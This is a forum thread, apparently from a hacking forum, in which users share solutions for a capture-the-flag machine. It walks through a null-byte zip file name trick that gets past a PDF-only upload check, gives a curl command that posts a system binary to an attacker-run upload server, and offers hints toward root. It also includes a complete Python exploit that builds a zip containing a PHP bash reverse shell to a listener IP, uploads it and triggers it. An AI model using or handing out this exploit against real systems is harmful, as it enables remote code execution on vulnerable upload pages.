[frfrfrfrfrfrf]

Normal upload protection bypasses work, if you managed to create a file with those characters inside the zip.

i've tried using double extension, null byte at the end, and some other techniques but nothing worked as well, i can upload the file but always gonna be a PDF, and using the zip symlink i got the "/shop/index.php" but i didn't know if its possible to bypass the 

$page = isset($_GET['page']) && file_exists($_GET['page'] . '.php') ? $_GET['page'] : 'home';

so how did you triggered the file?

To get the rev shell: Give it a name, for example, shell.phpA.pdf. Compress it. You don't need to do any tricks with symbolic links. Open it in hexedit and change the 'A' to 00 (null byte). Upload this and go to the end point of the file you are given. Delete the <space> .pdf in the url. You will get a shell.

[hackxor]

it worked!!! thanks buddy

[SingaporeFriend]

Anyone got further with reverse engineering? Figured out the password, but not much more.

[SingaporeFriend]

Silly question but how did you manage to send the "stock" file to your computer? Neither python nor netcat are working

python3 -m uploadserver
curl -i -X POST -F "files=@/usr/bin/stock" http://10.10.X.X:8000/upload

[frfrfrfrfrfrf]

Anyone got further with reverse engineering? Figured out the password, but not much more.

it is not necessary to use reverse engineering, for password use strings and to see the vulnerability to get root use strace

[SingaporeFriend]

Anyone got further with reverse engineering? Figured out the password, but not much more.

it is not necessary to use reverse engineering, for password use strings and to see the vulnerability to get root use strace

thanks that was the hinted I needed.

For anyone else just run the the binary with strace and look closely at the output.

[hackxor]

Anyone got further with reverse engineering? Figured out the password, but not much more.

it is not necessary to use reverse engineering, for password use strings and to see the vulnerability to get root use strace

thanks man i've rooted

[LoadError]

I followed all the steps mentioned in previous messages (create a shell.phpX.pdf, zip it, hexedit the X to 00, upload it) but once i tried to access the created url I get a "Not Found" Error. What am I doing wrong?
I used the rev shell from pentestmonkey, is there any change that the shell is the problem?

change the byte at the end of the zip file instead of the beginning

[hackxor]

Anyone got further with reverse engineering? Figured out the password, but not much more.

it is not necessary to use reverse engineering, for password use strings and to see the vulnerability to get root use strace

thanks that was the hinted I needed.

For anyone else just run the the binary with strace and look closely at the output.

Has it something to do with libcounter.so?

I think yes, but... do you know how to execute strace with sudo?

you don't need to use the strace with sudo actually

[randomname188]

i wrote a script to get reverse shell for user.
start nc port 9001 ant then run like this: python script.py -L <your-IP> -R <target-IP>

from struct import pack
import argparse
import zlib
import requests

parser = argparse.ArgumentParser(description='Exploit Zipper')
parser.add_argument('-L', '--listener_ip', help='listener ip')
parser.add_argument('-R', '--target_ip', help='target ip')
args = parser.parse_args()

filename1 = b'rev.php.pdf'
filename2 = b'rev.php\x00.pdf'

filecontent = b"""<?php system("bash -c 'bash -i >& /dev/tcp/"""+args.listener_ip.encode()+b"""/9001 0>&1'"); ?>"""
length = len(filecontent)
crc = zlib.crc32(filecontent)


p  = b''
p += b'\x50\x4b\x03\x04' # magic bytes
p += b'\x14\x00' # version
p += b'\x00\x00' # flags
p += b'\x00\x00' # compression
p += b'\x48\xb9' # modtime
p += b'\x1b\x57' # moddate
p += pack("<L", crc) # crc
p += pack("<L", length) # compressed size
p += pack("<L", length) # uncompressed size
p += pack("<H", len(filename1)) # filename len
p += b'\x00\x00' # extra field len
p += filename1
p += filecontent

# central directory
cd  = b''
cd += b'\x50\x4b\x01\x02' # magic bytes
cd += b'\x14\x03' # version
cd += b'\x14\x00' # version needed
cd += b'\x00\x00' # flags
cd += b'\x00\x00' # compression
cd += b'\x48\xb9' # modtime
cd += b'\x1b\x57' # moddate
cd += pack("<L", crc) # crc
cd += pack("<L", length) # compressed size
cd += pack("<L", length) # uncompressed size
cd += pack("<H", len(filename2)) # filename len
cd += b'\x00\x00' # extra field len
cd += b'\x00\x00' # file comm. len
cd += b'\x00\x00' # disk start
cd += b'\x00\x00' # internal attr.
cd += b'\x00\x00\xA4\x81' # external attr
cd += b'\x00\x00\x00\x00' # offset of local header
cd += filename2

# end of centryl directory record
ecd  = b''
ecd += b'\x50\x4b\x05\x06' # magic bytes
ecd += b'\x00\x00' # disk number
ecd += b'\x00\x00' # disc # w/cd
ecd += b'\x01\x00' # disc entries
ecd += b'\x01\x00' # total entries
ecd += pack("<L", len(cd)) # central directory size
ecd += pack("<L", len(p))
ecd += b'\x00\x00'

f = open("rev.zip", "wb")
f.write(p+cd+ecd)
f.close()

url = "http://{}/upload.php".format(args.target_ip)
headers = {"Content-Type":'multipart/form-data'}
files = {'submit':(None,''),'zipFile':('rev.zip',p+cd+ecd)}
resp = requests.post(url, files=files)

for line in resp.text.split('\n'):
    if 'uploads' in line:
        requests.get("http://{}/{}".format(args.target_ip,line.split('"')[1].split(" ")[0]))
        exit(0)

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | Contact us via http://breachedmw4otc2lhx7nqe4wyxfhpvy32ooz26opvqkmmrbg73c7ooad.onion/contact if you feel this is incorrect.